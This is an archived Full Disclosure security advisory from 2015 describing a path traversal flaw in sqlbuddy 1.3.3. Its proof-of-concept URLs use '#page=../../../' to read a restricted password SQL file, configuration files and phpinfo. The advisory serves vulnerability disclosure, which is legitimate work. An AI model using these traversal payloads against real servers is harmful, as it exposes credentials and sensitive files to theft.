Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Sqlbuddy Path Traversal Vulnerability

From: John Page <hyp3rlinx () gmail com>
Date: Sat, 9 May 2015 18:57:42 -0400
Read arbitrary server files:

Affected Vendor:
www.sqlbuddy.com

Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt

Product:
sqlbuddy version 1.3.3 SQL Buddy is an open source web based MySQL
administration application.

Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about
directories an read any PHP and non PHP files by appending
the '#' hash character when requesting files via URLs.

e.g. .doc, .txt, .xml, .conf, .sql etc...

After adding the '#' character as a delimiter any non PHP will be returned
and rendered by subverting the .php concatenation used
by sqlbuddy when requesting PHP pages via POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>


POC exploits:
=======================

1-Read from Apache restricted directory under htdocs:
  http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#

2-Read any arbitrary files that do not have .PHP extensions:
  http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#

3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
  http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo


Disclosure Timeline:
==================================

Vendor Notification  N/A
May 9, 2015: Public Disclosure - hyp3rlinx


Exploitation Technique:
=======================
Create a test file with non .php extension in some htdocs directory then
request the page in the browser.
http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt#

Severity Level:
===============
High


Description:
==========================

Request Method(s):
                                [+] POST

Vulnerable Product:
                                [+] sqlbuddy 1.3.3

Vulnerable Parameter(s):
                                [+] #page=[somefile]

Affected Area(s):
                                [+] Server directories & sensitive files

===============================

(hyp3rlinx)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: